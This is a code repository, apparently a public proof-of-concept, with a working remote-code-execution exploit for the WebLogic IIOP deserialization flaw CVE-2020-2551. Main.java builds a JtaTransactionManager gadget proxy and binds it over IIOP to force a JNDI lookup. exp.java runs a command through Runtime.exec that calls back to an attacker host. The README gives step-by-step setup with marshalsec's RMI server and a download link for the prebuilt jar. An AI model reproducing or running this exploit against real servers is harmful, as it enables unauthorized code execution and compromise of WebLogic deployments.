[
{
"path": ".gitignore",
"content": "# Created by .ignore support plugin (hsz.mobi)\n### Java template\n# Compiled class file\n*.class\n\n# Log file\n*.log\n\n# BlueJ files\n*.ctxt\n\n# Mobile Tools for Java (J2ME)\n.mtj.tmp/\n\n# Package Files #\n*.war\n*.nar\n*.ear\n*.zip\n*.tar.gz\n*.rar\n\n# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml\nhs_err_pid*\n\n.idea\nout"
},
{
"path": "Makefile",
"content": "all:\n\tant run\n\tjavac src/exp.java\n\t#cd src; sudo python3 -m http.server 80\n"
},
{
"path": "README.md",
"content": "## CVE-2020-2551\nWeblogic IIOP 反序列化\n\n## 测试环境\nWeblogic10.3.6+jdk1.6\n\n[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码:a6ob \n\n## 漏洞利用\n下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java\n```java\npackage payload;\n\nimport java.io.IOException;\n\npublic class exp {\n\n public exp() {\n String cmd = \"curl http://172.16.1.1/success\";\n try {\n Runtime.getRuntime().exec(cmd).getInputStream();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n}\n```\n\n**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器\n\n```\npython -m http.server --bind 0.0.0.0 80\n```\n\n命令行运行jar包\n```\njava -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp\n```\n实际效果如图\n\n\n## 已知问题\n很多小伙伴都说复现不成功,看了网上的一些文章发现IIOP存在nat模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。\n\n## 参考\n\nhttps://y4er.com/post/weblogic-cve-2020-2551/\n"
},
{
"path": "build.xml",
"content": "\n \n \n \n \n \n \n \n\n \n \n \n\n \n \n \n\n \n \n \n \n\n \n \n \n \n \n \n \n \n \n\n \n \n \n\n"
},
{
"path": "src/META-INF/MANIFEST.MF",
"content": "Manifest-Version: 1.0\nMain-Class: com.payload.Main\n\n"
},
{
"path": "src/com/payload/Main.java",
"content": "package com.payload;\n\nimport com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;\nimport com.nqzero.permit.Permit;\n\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport java.lang.reflect.*;\nimport java.rmi.Remote;\nimport java.util.HashMap;\nimport java.util.Hashtable;\nimport java.util.Map;\n\npublic class Main {\n\n public static final String ANN_INV_HANDLER_CLASS = \"sun.reflect.annotation.AnnotationInvocationHandler\";\n\n public static void main(String[] args) {\n try {\n if (args.length != 3) {\n System.out.println(\"java -jar IIOP_CVE_2020_2551.jar rhost rport rmiurl\");\n System.out.println(\"java -jar IIOP_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp\");\n System.out.println(\"先起一个RMIRefServer服务\");\n System.out.println(\"java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \\\"http://172.16.1.1/#exp\\\" 1099\");\n System.out.println(\"jdk1.6\\\\bin\\\\javac exp.java 将生成的exp.class放入当前目录\");\n System.out.println(\"exp.class目录起一个WEB服务 python3 -m http.server --bind 0.0.0.0 80\");\n System.out.println(\"test on weblogic 10.3.6 success!\");\n System.out.println(\"welcome to myblog: http://Y4er.com\");\n System.exit(0);\n }\n String ip = args[0];\n String port = args[1];\n String rmiurl = args[2];\n String rhost = String.format(\"iiop://%s:%s\", ip, port);\n\n Hashtable env = new Hashtable();\n // add wlsserver/server/lib/weblogic.jar to classpath,else will error.\n env.put(\"java.naming.factory.initial\", \"weblogic.jndi.WLInitialContextFactory\");\n env.put(\"java.naming.provider.url\", rhost);\n Context context = new InitialContext(env);\n // get Object to Deserialize\n JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();\n jtaTransactionManager.setUserTransactionName(rmiurl);\n\n Remote remote = createMemoitizedProxy(createMap(\"pwned\"+System.nanoTime(), jtaTransactionManager), Remote.class);\n context.rebind(\"Y4er\"+System.nanoTime(), remote);\n } catch (Exception ex) {\n ex.printStackTrace();\n System.out.println(\"------------------------\");\n System.out.println(\"----没有回显 自行检测----\");\n System.out.println(\"------------------------\");\n }\n }\n\n public static T createMemoitizedProxy(final Map map, final Class iface, final Class... ifaces) throws Exception {\n return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);\n }\n\n public static InvocationHandler createMemoizedInvocationHandler(final Map map) throws Exception {\n return (InvocationHandler) getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);\n }\n\n public static Constructor getFirstCtor(final String name) throws Exception {\n final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];\n setAccessible(ctor);\n return ctor;\n }\n\n public static void setAccessible(AccessibleObject member) {\n // quiet runtime warnings from JDK9+\n Permit.setAccessible(member);\n }\n\n public static T createProxy(final InvocationHandler ih, final Class iface, final Class... ifaces) {\n final Class[] allIfaces = (Class[]) Array.newInstance(Class.class, ifaces.length + 1);\n allIfaces[0] = iface;\n if (ifaces.length > 0) {\n System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);\n }\n return iface.cast(Proxy.newProxyInstance(Main.class.getClassLoader(), allIfaces, ih));\n }\n\n public static Map createMap(final String key, final Object val) {\n final Map map = new HashMap();\n map.put(key, val);\n return map;\n }\n}\n"
},
{
"path": "src/exp.java",
"content": "package payload;\n\nimport java.io.IOException;\n\npublic class exp {\n\n public exp() {\n String cmd = \"curl http://172.16.1.1/success\";\n try {\n Runtime.getRuntime().exec(cmd).getInputStream();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n}\n"
},
{
"path": "weblogic_CVE_2020_2551.iml",
"content": "\n\n \n \n \n \n \n \n \n \n \n"
}
]